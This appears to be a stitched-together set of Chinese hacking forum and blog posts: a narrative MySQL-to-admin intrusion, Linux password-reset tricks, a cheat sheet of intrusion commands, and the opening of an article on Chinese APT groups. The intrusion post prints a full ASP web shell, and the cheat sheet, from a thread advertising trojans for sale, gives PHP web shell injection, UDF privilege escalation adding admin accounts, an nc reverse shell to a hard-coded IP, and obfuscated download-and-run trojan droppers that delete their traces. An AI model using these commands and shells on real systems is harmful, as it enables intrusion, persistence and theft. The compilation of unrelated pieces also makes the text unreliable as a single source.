3306端口的入侵(mysql)

Posted on

3306端口的入侵(mysql)

岁月联盟 - 技术社区 - BBS.SYUE.COM

注册 登录

岁月联盟 - 技术社区 - BBS.SYUE.COM » [ Hacking & Defence ] 黑客攻击与防范 » 3306端口的入侵(mysql) 返回列表 发帖

猪猪

猪猪 (Wei.H)**当前离线 UID 7 帖子 7814 精华 230 积分 32287 威望 2777 金币 14812 贡献 3401 性别 男 来自 中国 在线时间 2333 小时 注册时间 2006-5-11 最后登录 2010-1-8

QQ个人空间 查看个人网站查看详细资料

等级:管理员

闪坛最高荣誉勋章优秀版主勋章 1/# 跳转到 » 倒序看帖

打印

字体大小: tT

发表于 2008-5-11 11:52 | 只看该作者

3306端口的入侵(mysql)

这一节说一下3306端口,通过Mysql入侵服务器. 坦白的讲,我对mysql知道的太少,只是知它于mssql相对应的1433端口,它是3306。在w2k上它主要和是php组合,我一直学习的是asp+acess,没学习过mysql,也从来没有通过mysql成功入侵过服务器.为了使我的总结生一点光,全面一点,我这儿就转一篇文章,利用mssql入侵w2k服务器。全文如下,我加了一个图和一点注解和读后感: 某天晚上在IRC的时候,一个老朋友说帮他看看他的新主页的安全性,然后给出URL是abc.target.net,我一看觉得挺眼熟的,target.net公 司里面的CEO,人事部经理,网管我都认识的,前段时间还差点去了那里做网管呢,呵呵,那就看看他们的服务器做的如何吧。 随后用nmap扫描了一下abc.target.net,发现开的端口挺多的,看来没有安装防火墙或做TCP/IP过滤。从IIS版本判断是Windows 2000的服 务器。IIS没什么好利用的,一看开了3306端口,是mysql的,就用我的mysql客户端尝试连接了一下,root的密码竟然为空(lcx注:默认安装),后来就觉得没有多 大意思,于是把目标转http://www.target.net/,他们的主站,哈哈。 Ok!先用nmap扫描一下,扫描结果如下: 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop-3 389/tcp open ldap 1002/tcp open unknown 3306/tcp open mysql 然后从IIS版本判断目标是windows 2000服务器。从开放的端口来看,它要么是安装了防火墙,要么是做了TCP/IP过滤,呵呵,比 abc.target.net有意思多了。从25和110端口返回的数据来看,他们用的邮件服务器是IMail 6.04,没什么可利用的。IIS上面网管做了安全配 置,一些默认的CGI漏洞也没有,这也没什么好利用的。只剩下最后一个端口了,习惯性的用我的mysql客户端连接试试: F:\cmd〉mysql -u root -h http://www.target.net/ Welcome to the MySQL monitor. Commands end with or \g. Your MySQL connection id is 3038 to server version: 3.23.21-beta Type <|>help;<|> or <|>\h<|> for help. Type <|>\c<|> to clear the buffer mysql〉 也有图形连接方式,lcx给你个图看看. MySQL.gif

下载 (14.15 KB) 2008-5-11 11:52 呵呵,不好意思,看来网管没有给mysql帐号root设置一个密码,是默认的空密码,那么我们就可以利用这个漏洞来做点什么了。如果是 MS-SQL数据库的话就好办啦,直接可以用xp_cmdshell来运行系统命令,但是可惜的是mysql没有类似MS-SQL那样的扩展存储过程。 现在我们可以利用这个漏洞来做三件事情: 〈1〉搜索mysql数据库里面的内容,看能不能找出一些有用的敏感信息,我找了一会儿就不想找了,呵呵 〈2〉读取服务器上的任何文件,当然前提是知道文件的物理路径 〈3〉以启动mysql服务用户的权限往服务器上写文件,前提是这个文件要不存在的,就是说不能覆盖文件 如果我们知道IIS主目录的物理路径的话,我们就可以往上面写一个ASP上去,然后通过IE来执行系统命令。怎么得到IIS目录的物理路径呢 ?天知道! 没办法,猜吧。。。。。。先在mysql默认数据库test中建一个表tmp,这个表只有一个字段str,类型为TEXT, mysql〉 use test;create table tmp(str TEXT); Database changed Query OK, 0 rows affected (0.05 sec) 然后凭着自己做网管的直觉,开始猜测IIS主目录的物理路径,c:\inetpub\wwwroot,c:\www,c:\wwwroot,c:\inetpub\web,d:\web, d:\wwwroot,都不对,55555。大概猜测到第10次,我的mysql客户端回显信息如下: mysql〉load data infile "d:\www\gb\about\about.htm" into table tmp; Query OK, 235 rows affected (0.05 sec) Records: 235 Deleted: 0 Skipped: 0 Warnings: 0 哈哈哈,猜中了,IIS主目录的物理路径是d:\www,因为上面的文件的虚拟路径是http://www.target.net/gb/about/about.htm,看来我得 到一个shell了,呵呵。 接下来我们就可以往d:\www\gb\about里面写一个ASP文件进去,然后通过http://www.target.net/gb/about/cmd.asp来执行系统命令了。 然后在网上找来一个现成的cmd.asp,懒的自己去写了:)。Cmd.asp如下: -------------------------------cmd.asp---------------------------------------- 〈% Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next Set oScript = Server.CreateObject(""WSCRIPT.SHELL"") Set oScriptNet = Server.CreateObject(""WSCRIPT.NETWORK"") Set oFileSys = Server.CreateObject(""Scripting.FileSystemObject"") szCMD = Request.Form("".CMD"") If (szCMD 〈〉 """") Then szTempFile = ""C:\" & oFileSys.GetTempName() Call oScript.Run (""cmd.exe /c "" & szCMD & "" 〉 "" & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) End If %〉 〈HTML〉〈BODY〉〈FORM action=""〈%= Request.ServerVariables(""URL"") %〉"" method=""POST""〉 〈input type=text name="".CMD"" size=45 value=""〈%= szCMD %〉""〉〈input type=submit value=""Run""〉〈/FORM〉〈PRE〉 〈% If (IsObject(oFile)) Then On Error Resume Next Response.Write Server.HTMLEncode(oFile.ReadAll) oFile.Close Call oFileSys.DeleteFile(szTempFile, True) End If%〉 〈/BODY〉〈/HTML〉 ----------------------------end of cmd.asp----------------------------------- 由于往mysql数据库中插入数据的时候,会过滤特殊字符什么的,例如双引号之类的,特别麻烦。各位留意没有,上面的ASP语句中,都是 两个双引号一起的,这样才能写进去,原来是一个双引号的。然后我在数据库中再建一个表: mysql〉 use test;create table cmd(str TEXT); Database changed Query OK, 0 rows affected (0.05 sec) 然后用如下语句,一句一句把上面的ASP写进去: mysql〉 insert into cmd values("一行一行的asp代码,呵呵"); 为什么不全部一起写进去呢?呵呵,换行后,一会儿导出的文件就会有特殊字符了,asp就不能正常运行了,只能辛苦点一行一行写了。然 后把asp文件导到服务器上: mysql〉select / from cmd into outfile "d:\www\gb\abou\cmd.asp"; 然后把我们刚才建的表都删除掉: mysql〉 use test; drop table tmp; drop table cmd; ok!我们得到一个shell了,虽然权限不高,但毕竟已经向取得admin权限迈出一大步了,不是吗,呵呵。做这个asp文件可花了我不少时间 哦。现在我们利用这个shell来收集系统信息,尝试取得admin权限。 〈1〉先看一下系统文件权限设置如何: c:\ Everyone:(OI)(CI)F d:\ \xxx:(OI)(CI)(DENY)(特殊访问:) DELETE READ_CONTROL WRITE_DAC WRITE_OWNER STANDARD_RIGHTS_REQUIRED FILE_READ_DATA FILE_WRITE_DATA FILE_APPEND_DATA FILE_READ_EA FILE_WRITE_EA FILE_EXECUTE FILE_DELETE_CHILD FILE_READ_ATTRIBUTES FILE_WRITE_ATTRIBUTES Everyone:(OI)(CI)F 看来我们现在就可以读写硬盘上的任何文件了,现在就可以改他的首页了,但这样做没意思,对不对,我们的目标是取得admin权限,呵呵 。 〈2〉然后搜索一下硬盘上都有些什么文件: c:\Program Files 的目录下有两个比较有意思的文件, 2000-12-19 13:10  Serv-U 2001-01-20 22:43 绿色警戒 把Serv-U里面的用户和密码读出来看看后,没有什么用处,然后进入绿色警戒目录看看,呵呵,除了log外,什么都没有,呵呵。 〈3〉再看看都有哪些用户: Guest IUSR_SERVER_1 IUSR_SERVER-2 IWAM_SERVER_1 IWAM_SERVER-2 ceo[他们CEO的帐号J] TsInternetUser 管理员有ceo 和target\Domain Admins,看来这台机器是他们域中的一台服务器。开始本来想给ceo下一个套,在他的启动目录里放一个程序,但后来看到这个帐号已经几个月没登陆了,就放弃了。 〈4〉看看启动了那些服务,这几个比较有意思, 看来都是默认的: Task Scheduler Simple Mail Transport Protocol (SMTP) Task Scheduler 〈5〉看看网络状况,这几个比较有意思: TCP 0.0.0.0:21 0.0.0.0:0 LISTENING TCP 0.0.0.0:119 0.0.0.0:0 LISTENING TCP 192.168.1.3:3389 0.0.0.0:0 LISTENING 看来有TermService,不过在网卡上做了TCP/IP过滤,只对内网开放,那么我们就来 〈6〉看看网卡设置信息: Ethernet adapter 本地连接: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Realtek RTL8139(A) PCI Fast Ethernet Adapter Physical Address. . . . . . . . . : 00-E0-4C-68-C4-B2 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 192.168.1.3 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : DNS Servers . . . . . . . . . . . : Ethernet adapter 本地连接 2: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Realtek RTL8139(A) PCI Fast Ethernet Adapter/#2 Physical Address. . . . . . . . . : 00-E0-4C-68-B8-FC DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . :xxx Subnet Mask . . . . . . . . . . . : Default Gateway . . . . . . . . . : 经过上面的一些步骤,对这台服务器的设置情况就有了一个大概的了解。如何取得admin权限?netdde?pipeupadmin?呵呵,无法利用,没 有可利用的可以登陆的用户。下套?等到什么时候,呵呵。 Okok!让我们来看看这个系统都打了些什么补丁。怎么查看?呵呵,打了补丁后,信息都会存贮在注册表中,查询注册表中的这个键值就行 了:"HKLM\Software\Microsoft\Windows NT\CurrentVersion\hotfix",这样的话,我们得上传一个reg.exe[M$ Resource Kit中的命令行注册 表编辑器]到服务器里面,我们才能操作他的注册表。开始我想用先写一个ftp脚本,然后ftp -s:cmd.txt让他到我的服务器来下载,但结果失 败了,后来才想起他做了TCP/IP过滤,5555,我记性真不好。怎么办呢?有办法,用tftp来传输。我先在我的服务器上安装了一个Cisco TFTP Server,然后在目标机器上运行tftp -I http://www.eyas.org/ GET reg.exe,呵呵,传输过去咯。然后运行 REG QUERY "HKLM\Software\Microsoft\Windows NT\CurrentVersion\hotfix" 返回数据如下: Listing of [Software\Microsoft\Windows NT\CurrentVersion\hotfix] [Q147222]==〉这个不知道是什么东西,好象默认2k机器上都有 [Q269862]==〉Q269862_W2K_SP2_x86_CN.EXE==〉Microsoft IIS Unicode解码目录遍历漏洞! [Q277873]==〉Q277873_W2K_sp2_x86_CN.EXE==〉Microsoft IIS CGI文件名检查漏洞! 呵呵,==〉和后面的说明是我加上去的,不是注册表中的。看来管理员不太勤快啊,只打了两个补丁。 哈哈!到了这一步,大家想到怎么取得admin权限了吗?呵呵,你一定也想到了,他的机器开了TermService服务,但windows2000登陆验证 可被绕过的漏洞没有安装补丁,此补丁为Q270676_W2K_SP2_x86_CN.EXE。由此看来,管理员只是删除了帮助法文件,而没有打补丁。用dir c:\winnt\help\win/验证一下,果然没有熟悉的输入法帮助文件。敌人没有输入法,我们帮他造,hoho~~别忘了我们可以往任何地方写文件哦。 嘻嘻,咱们也别高兴的太早了,别忘了他的机器做了TCP/IP过滤哦,我们是没有办法连接到他的3389端口的。不要着急,不要着急,让我 们先来看看他的TCP/IP过滤的设置情况。怎么看呢?老办法,查看注册表里面的键值啦。用刚才的reg.exe查询 〈1〉reg QUERY "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces" Listing of [System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces] [{4B41CFFB-4A20-42F8-9087-A89FE71FD8F4}] [{612A3142-DB85-4D4E-8028-81A9EB4D6A51}] 〈2〉reg QUERY "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\ {4B41CFFB-4A20-42F8-9087-A89FE71FD8F4}" Listing of [System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\ {4B41CFFB-4A20-42F8-9087-A89FE71FD8F4}] MULTI_SZ IPAddress MULTI_SZ TCPAllowedPorts 25;53;80;110;3306; MULTI_SZ UDPAllowedPorts 0; MULTI_SZ RawIPAllowedProtocols 0; 〈3〉reg QUERY "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\ {612A3142-DB85-4D4E-8028-81A9EB4D6A51}" Listing of [System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\ {612A3142-DB85-4D4E-8028-81A9EB4D6A51}] MULTI_SZ IPAddress 192.168.1.3; MULTI_SZ TCPAllowedPorts 0; MULTI_SZ UDPAllowedPorts 0; MULTI_SZ RawIPAllowedProtocols 0; 篇幅关系,我过滤了一些输出。第二次查询的是外网网卡,我们可以得知只开放了TCP 25,53,80,110,3306,UDP全部,IP协议全部。 第三次查询的是内网网卡,没有任何限制。 现在我们可以把输入法帮助文件上传到他的c:\winnt\help目录下去,然后如果能连接到他的3389端口的话,我们就可以得到admin权限了。问 题的关键是外网网卡做了TCP/IP限制。55555,怎么办呢?如何突破?有办法!我们可以利用socket转发和反弹端口技术,照样可以连接到敌人 的TermService! 具体过程如下: 〈1〉在我的另一台服务http://www.eyas2.org/[我称他为AgentMaster]上运行一个程序,监听3389端口[等待我的TermClient去连接],监听11111端 口[等http://www.target.net/来连接],当然了,第2个端口可以随便选,第1个端口选其他的话,就要相应的修改 TermClient,比较麻烦 〈2〉http://www.target.net/[我称他为AgentSlave]运行另外一个程序, 先连接http://www.eyas2.org:11111/,再连接到192.168.1.3:3389[敌人服务器 内网的IP] 〈3〉 我的TermClient连接http://www.eyas2.org:3389/,这样,数据通道就全部建立好了。接下来,两个程序就忠实的为我们转发数据了。 注意http://www.eyas2.orgwww.eyas.org/可以为同一台服务器,但要保http://www.target.net/能connect上你的服务器。192.168.1.3也可以换为他内网 的任何一个IP。这样,当我用TermClient连接http://www.eyas2.org/的时候,其实是连接http://www.target.net/。当熟悉的登陆界面出现在我面前,我熟练的调出输入法,取得admin权限,呵呵,心里还有那么一点点成就感! 简要的回顾一下:发现mysql漏洞==〉凭直觉猜中IIS物理路径==〉写一个cmd.asp文件上去得到一个shell==〉利用系统配置错误取得admin 权限接下来要做的事情,就是把漏洞通知他们的网管了[我可不敢直接告诉他们CEO,呵呵],本来想在那机器上装个sniff什么的,再用来做跳 板进一步尝试入侵他的内网,但后来想想还是算了,呵呵。 这是我在网上发现一篇好文章,读起来如饮香醇,满心喜悦,并对作者由衷佩服,赞赏他的技术,更是思路.这也是我们菜鸟和伪高手努力的一个方向了.mysql入门指南。 收藏 分享 **

djyangmaowei

djyangmaowei 当前离线 UID 23555 帖子 65 精华 0 积分 141 威望 0 金币 66 贡献 0 在线时间 10 小时 注册时间 2008-4-29 最后登录 2008-9-17

个人空间 查看详细资料

级别:上士

2/#

发表于 2008-5-19 16:44 | 只看该作者

qianghan **

TOP 返回列表

[收藏此主题] [关注此主题的新回复]

[通过 QQ、MSN 分享给朋友]

岁月联盟 ( 皖ICP备05004589号 - 联系QQ:100298)|联系我们 |论坛统计|Archiver|WAP|

GMT+8, 2010-1-8 18:16.

Powered by Discuz! 7.2

© 2001-2009 Comsenz Inc. Google 输入您的搜索字词 提交搜索表单 Web syue.com

Linux密码终极破解之战

Posted on

Linux密码终极破解之战

Linux密码终极破解之战

2013-05-22 10:12 推荐: 网路游侠 浏览: 93 views 我要评论 字号:

分享到: 0 摘要: 想写linux的相关文章很久了,身为一个运维出身的伪技术,我觉得linux是以后的趋势,所以linux的密码安全第一步要做好至关重要,本文对linux密码攻防作出说明,平台 Red Hat Linux (2.4.20-8) . 破解登录密码 GRUB:在引导装... 想写linux的相关文章很久了,身为一个运维出身的伪技术,我觉得linux是以后的趋势,所以linux的密码安全第一步要做好至关重要,本文对linux密码攻防作出说明,平台 Red Hat Linux (2.4.20-8) .

破解登录密码

GRUB:在引导装载程序菜单上,键入[e] 来进入编辑模式。你会面对一个引导项目列表。查找其中类似以下输出的句行: kernel /vmlinuz-2.4.18-0.4 ro root=/dev/hda2按箭头键直到这一行被突出显示,然后按 [e]。你现在可在文本结尾处空一格再添加 single 来告诉 GRUB 引导单用户 Linux 模式。按 [Enter] 键来使编辑结果生效。你会被带会编辑模式屏幕,从这里,按GRUB 就会引导单用户Linux 模式。结束载入后,你会面对一个与以下相似的shell 提示:sh-2.05/# 现在,你便可以改变根命令,键入:bash/# passwd root 你会被要求重新键入口令来校验。结束后,口令就会被改变,你便可以在提示下键入reboot 来重新引导;然后,象平常一样登录为根用户。LIL当系统启动到出现LILO引导画面时,对于图形引导方式按TAB键进入文本方式,然后在LILO处输入linux single回车即可进入免密码的控制台,进入以后使用passwd命令修改root的密码即可。

方法二:grub->linux->选中间一项—E—>在提示符后输入 (/ linux s init 1)–回车–b–>重启后,在提示符后输入(vi /etc/passwd 并将其中用户的密码传输位(x)去掉,强制保存)—-重启即可!

这是最常见也最快捷的方法

防止别人通过单用户模式修改密码。

由于想引导单用户模式需要在grub中进行编辑。因此,我们只要对grub进行加密,不让别人修改grub就可以防止了。

方法如下:

1.grub有一个配置文件,在/etc这个文件夹中。名称是“grub.conf”,找到这个文件,用vi编辑。

2.我们看下文件中的内容:(注释就免了)

default=0

timeout=10

splashimage=(hd0,0)/grub/splash.xpm.gz

title Red Hat Linux (2.4.20-8)

root (hd0,0)

kernel /vmlinuz-2.4.20-8 ro root=LABEL=/

initrd /initrd-2.4.20-8.img

具体含义大家可以查看下grub的相关文档,这里我们要加进密码。

共有两个地方可以添加密码。

3.第一处是“timeout=10”的下面,在这里加上“password=123456”(123456是自己的密码)。保存,退出,重启。我们可以看到,在grub的界面上已经不可以按“e”进行修改了。想修改必须按“p”输入密码后进行修改。

4.第二处是“initrd /initrd-2.4.20-8.img”的下面。在这里加上“password=123456”(123456是自己的密码)。保存,退出,重启。我们可以看到,linux启动前(过了grub界面)又多了一个密码。值得注意的是:这个密码是可以防止单用户模式进入的。也就是说,即使我们通过编辑grub启动单用户模式,还是要输入这个密码的。

如何破解grub密码,进而取得用户权限。

想要取得grub密码,我们就得想办法读取到grub.conf文件。但是没有grub密码,没有root密码……因此我们就不能通过grub引导。

方法如下:

1.首先要修改这个虚拟机的启动方式,我们需要从光盘启动。而虚拟机默认是硬盘为第一启动方式。

在虚拟机刚启动的时候(那个大大的“vmware”的界面)马上按“F2”进入bios。

2.选择到boot那一栏。选中“CD-ROM Drive”一项,按“+”把“CD-ROM Drive”这一项提升到最上面。这样系统就默认光盘启动为第一启动方式了。

3.把linux的第一张安装盘镜像绑定光驱后,保存,重启。系统会直接进入linux的安装界面。在提示符下输入“linux rescue”回车,系统将启动linux救援模式。

4.途中会有几个选项,按照提示选择就好。最后会看到一个说明,大概是说这个救援系统把原来的系统文件(硬盘上的那个)挂载到了“/mnt/sysimage”文件夹下。

5.启动好后,我们就可以寻找grub.conf文件了。这里要注意下文件夹的结构:我们现在在救援系统的根目录下。而我们要找的是原系统的“/etc/grub.conf”,因此完整的路径是:“/mnt/sysimage/etc/grub.conf”。用vi编辑此文件,我们便可以看到,并且修改该文件。从而破解掉grub密码。

防止别人引导到linux救援模式。

我们可以看到,要引导到救援模式必须修改bios。那么我们就可以通过对bios加密来达到防止别人修改bios,从而无法从光盘引导的目的。

方法如下:

这个比较简单。进入bios后选择“Security”项。在“Set Supervisor Password”上回车。设置密码就可以了。这样。我们重新启动系统再次进入bios的时候就需要密码了。

如何破解bios密码。

我们平时清除主机bios密码的时候经常用什么方法呢?拔跳线,抠电池,让bios恢复出厂设置。那么,在虚拟机上有类似的方法么?

方法如下:

找到虚拟机所在的文件夹,里面应该有一个后缀名是“。nvram”的文件。把这个文件删掉。启动系统。我们可以看到。bios被重置了。

原文地址:http://www.anying.org/thread-3710-1-1.html 来源: <Linux密码终极破解之战 - 游侠安全网>

一些常用的入侵命令

Posted on

一些常用的入侵命令 - 【黑客资料】

黑客X档案官方论坛

注册 登录

返回列表 回复 发帖

孤风月影 (少年IT精英)**当前离线

玩的起继续 玩不起出局 ... ... ... QQ查看个人网站查看详细资料

正式版主

Rank: 9Rank: 9Rank: 9

帖子1385 积分693 威望0 个 金币7207 个 宣传3 个 注册时间2008-1-22 最后登录2009-10-26 1

打印

字体大小: tT

发表于 2009-10-15 17:05 | 只看该作者

承接免杀木马业务_出售各类免杀木马

[资料] 一些常用的入侵命令

load_file()读取文件 ————————————————————————————————— MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件,如: /usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件 /usr/local/apache2/conf/httpd.conf /usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置 /usr/local/app/php5/lib/php.ini //PHP相关设置 /etc/sysconfig/iptables //从中得到防火墙规则策略 /etc/httpd/conf/httpd.conf // apache配置文件 /etc/rsyncd.conf //同步程序配置文件 /etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP. /etc/my.cnf //mysql的配置文件 /etc/redhat-release //系统版本 /etc/issue /etc/issue.net c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码 c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码 c:\Program Files\Serv-U\ServUDaemon.ini c:\windows\my.ini //MYSQL配置文件 c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件 等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件, c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码 c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此 c:\Program Files\RhinoSoft.com\ServUDaemon.exe C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\/.cif文件 //存储了pcAnywhere的登陆密码 ———————————————————————————————————————————————— mssql差异备份webshell 1.备份数据 backup database 库名 to disk = 'c:\windows\char.bak';-- 2.创建表并插曲入数据 create table [dbo].[dtest] ([cmd] [image]); insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);-- 3.进行差异备份 backup database 库名 to disk='目标位置\char.asp' WITH DIFFERENTIAL,FORMAT;-- ————————————————————————————————————————————————— phpmyadmin插马 create table a (hack text not null); insert into a (hack) values ('<?php system($_REQUEST[cmd]);?>'); select hack from a into outfile 'D:/php/www/hack.php'; drop table a; phpmyadmin/libraries/select_lang.lib.php http://bbs.hackerxfiles.net/goto.php?url=aHR0cDovL3d3dy5oeGhhY2suY29tL2Jicy9pbmRleC5waHA= ————————————————————————————————————————————————— mysql提权 create function cmdshell returns string soname 'udf.dll' select cmdshell('net user 99990110 17216329 /add'); select cmdshell('net localgroup administrators 99990110 /add'); drop function cmdshell; ————————————————————————————————————————————————— serv-u修改权限配置 User9=Kindle|1|0 [USER=Kindle|1] Password=mg5D3A393510FB2F0C04FAA8211509296F 密码:17126329 HomeDir=c:\ RelPaths=1 PasswordLastChange=1239006396 TimeOut=600 Maintenance=System Access1=C:|RWAMELCDP ————————————————————————————————————————————————— ftp提权 quote site exec net.exe user Kindle$ 17216329 /add quote site exec net.exe localgroup administrators Kindle$ /add regedit /e "C:\Documents and Settings\All Users\Documents\system.ini" "HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\" 导入注册表是/s ————————————————————————————————————————————————— mysql爆表注射 SCHEMA_NAME information_schema.SCHEMATA TABLE_NAME information_schema.TABLES where TABLE_SCHEMA=... COLUMN_NAME information_schema.COLUMNS where TABLE_NAME=... —————————————————————————————————————————————————— cookie注射语句 javascript:alert(document.cookie="id="+escape("406 and 1=1")); —————————————————————————————————————————————————— 系统网马后门 copy 1.jpg \.\c:\com1.asp nc.exe -vv 203.171.230.200 111 -e C:\Downloads\cmd.exe dir /b /d /s /.exe>c:\1.txt 123';exec master..xp_cmdshell'net user 213 123 /add';-- javascript:lbtnUpload.click(); —————————————————————————————————————————————————— 命令行下载、运行木马 下文说一下搞定了肉鸡,如何保持长久上线,防止动态ip或者域名变化导致找不到肉鸡。 这需要种植木马,且这个木马要能够往外面咱们自己的服务器或者邮箱等报告自己的运行状态。 如何下载木马并种植到肉鸡上面的问题,其实网上也有零散的,我这儿算是整理,同时加上自己的体会。大家还是多实践,多搞搞肉鸡(最好练习命令行,3389登陆上去一对记录,如被追踪很危险的。其实我更相信,图形界面下能操作的,命令行都能操作正如windows下能搞的,linux下都能做到)这儿命令行可以是ms sql1433得到的xp_cmdshell等。 木马下载无非是ftp跟http的网页下载两种方式,这儿分别介绍: 1.ftp下载 这儿是使用肉鸡system32目录下的ftp.exe来访问我们放置木马的ftp服务。 显然要解决输入帐号密码的问题,同时要制定命令让远程的ftp.exe执行,从而下载文件。还好,这些都可以通过命令来解决。 假设木马文件在服务器ftpxx.3322.org下,帐号为ftpxx,密码为3322,文件为mm.exe。

通过命令行

echo ftpxxx>ftp.txt echo 3322>>ftp.txt echo get mm.exe>>ftp.txt echo bye>>ftp.txt

ftp -s:ftp.txt ftpxx.3322.org

则根据前一篇文章的&用法,也可以用一句命令完成: echo ftpxxx>ftp.txt & echo 3322>>ftp.txt & echo get mm.exe>>ftp.txt & echo bye>>ftp.txt & ftp -s:ftp.txt ftpxx.3322.org 这样就下载成功了。 下一步是执行木马并删除记录: 也就是一句话(三个语句): mm.exe & del ftp.txt & del mm.exe 2.html下载 这儿是使用肉鸡system32目录下的wscript.exe来执行指定的vbs脚本访问我们放置木马的http服务器。 假设木马地址为:http://bbs.hackerxfiles.net/goto.php?url=aHR0cDovL2Z0cHh4LjMzMjIub3JnL21tLmV4ZQ== mm.exe 通过命令行(无需任何修改,我已做免杀,除非被杀了,可以修改脚本) ========================== @echo with wscript:if .arguments.count^<2-0+0-0+0 then .quit:end if > thisis.vbs @echo set aso=.createobject("adodb.stream"):set thisisweb=createobject("mi"+"cr"+"o"+"s"+"o"+"ft.x"+"ml"+"h"+"ttp") >> thisis.vbs @echo thisisweb.open "g"+"e"+"t",.arguments(0),0:thisisweb.send:if thisisweb.status^>200 then .echo "E"+"r"+"r"+"o"+"r"+":"+thisisweb.status:.quit>> thisis.vbs @echo aso.type=1-0+0-0+0:aso.open:aso.write thisisweb.responsebody:aso.savetofile .arguments(1-0+0-0+0),2-0+0-0+0:end with >> thisis.vbs Type thisis.vbs ======================== 下一步是执行木马并删除记录: 也就是一句话(三个语句): cscript thisis.vbs http://bbs.hackerxfiles.net/goto.php?url=aHR0cDovL2Z0cHh4LjMzMjIub3JnL21tLmV4ZQ== mm.exe & del thisis.vbs & del mm.exe 或者简单的方法是(会弹出网页!): START its:http://bbs.hackerxfiles.net/goto.php?url=aHR0cDovL2Z0cHh4LjMzMjIub3JnL21tLmV4ZQ== 下载后, DIR /A /S "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\/*.EXE" 列出路径后,执行。 这儿帐号Default User也可能是当前用户 收藏 分享 评分 我的baidu空间

承接免杀木马业务_出售各类免杀木马 回复 引用

订阅 TOP

561726469

561726469 当前离线 查看个人网站查看详细资料

一年级

Rank: 1

帖子369 积分185 威望0 个 金币679 个 宣传1 个 注册时间2009-1-17 最后登录2009-10-25 2

发表于 2009-10-15 18:46 | 只看该作者

顶顶啊! 回复 引用

TOP ywxiaozi

ywxiaozi 当前离线 查看详细资料

学前班

帖子22 积分11 威望0 个 金币34 个 宣传3 个 注册时间2009-8-1 最后登录2009-10-18 3

发表于 2009-10-18 14:36 | 只看该作者

ding 顶顶 顶 喜欢简单 回复 引用

TOP

kfchina

kfchina 当前离线 查看详细资料

学前班

帖子23 积分12 威望0 个 金币53 个 宣传0 个 注册时间2009-9-30 最后登录2009-10-19 4

发表于 2009-10-19 22:50 | 只看该作者

好多,眼睛都看花了 回复 引用

TOP zkl_1987

zkl_1987 当前离线 查看详细资料

一年级

Rank: 1

帖子104 积分52 威望0 个 金币296 个 宣传1 个 注册时间2009-10-23 最后登录2009-10-28 5

发表于 昨天 10:42 | 只看该作者

谢谢分享…… 回复 引用

TOP

lxjlxj8

lxjlxj8 当前在线 查看详细资料

学前班

帖子2 积分1 威望0 个 金币85 个 宣传0 个 注册时间2007-2-9 最后登录2009-10-28 6

发表于 2 小时前 | 只看该作者

好东西支持 回复 引用

TOP

返回列表 论坛特区

京ICP备05044370号|Archiver|SiteMap |WAP|

GMT+8, 2009-10-28 11:17, Processed in 0.020896 second(s), 4 queries, Gzip enabled.

Powered by Discuz! 7.0.0 © 2001-2009

Designed by 54Abu.Cn

四大传奇:中国网络黑客组织

Posted on

四大传奇:中国网络黑客组织- FreebuF.COM

分享到

百度分享

登陆注册

freebuf

新浪微博 腾讯微博订阅我们

关于本文作者

robert.li

robert.li (2级)

二度空间战略网络安全研究中心

四大传奇:中国网络黑客组织

robert.li @ 专题, 资讯 2013-10-09 共 2342 人围观

四大传奇-中国网络黑客组织

(The Legend Four—Chinese Cyber Hacking Groups)

2013年的网络空间被一种新型概念主宰-高级可持续性威胁—也就当前网上出镜率很高的“APT”。而极具讽刺意义的是,中国黑客几乎成为了所有APT的代名词,人们也开始纷纷研究和猜测这些神秘黑客组织的来源于构成。自年初以来,各大媒体和安全公司不断爆出与中国有关的黑客组织和网络攻击活动,其中最传奇的四个APT要数: 曼迪昂特揭露的APT1; 卡巴斯基公司曝光的“Icefog”; 赛门铁克公司曝光的“隐匿山猫”; 纽约时报公布的APT12。

美国政府和安全公司均试图将这“四大传奇”黑客组织与中国政府和军队联系起来,而中国官方却始终重申与这些组织毫无关系。大量的媒体报道、美中之间的博弈、接近于现实的间谍活动以及近似于科幻的故事情节,这一切都吸引了无数网民的眼球,引发了公众对黑客组织幕后指使者的猜测。FB小编觉得大伙儿不应去探究四大传奇究竟是否与中国政府有关,本文目的是带领广大网络安全爱好者回顾一下这四大黑客传奇(传说),从他们的背景、攻击对象和攻击手段等角度比较和研究,能有所收获。

NO.1 APT1—黑客组织中的“大哥大”

知名度:★★★★★ 攻击技巧:★★★★ 攻击范围:★★★★ 曝光单位:曼迪昂特

1.背景介绍

APT1,特指解放军总参三部二局(61398部队)。曼迪昂特指出,APT1可能是中国政府资助的一个最持久的执行者;它是20多个来自中国的APT组的其中一组,其成员至少从2006年起就对广泛的受害者进行了网络间谍活动,在七年内攻击了全球150多个单位。

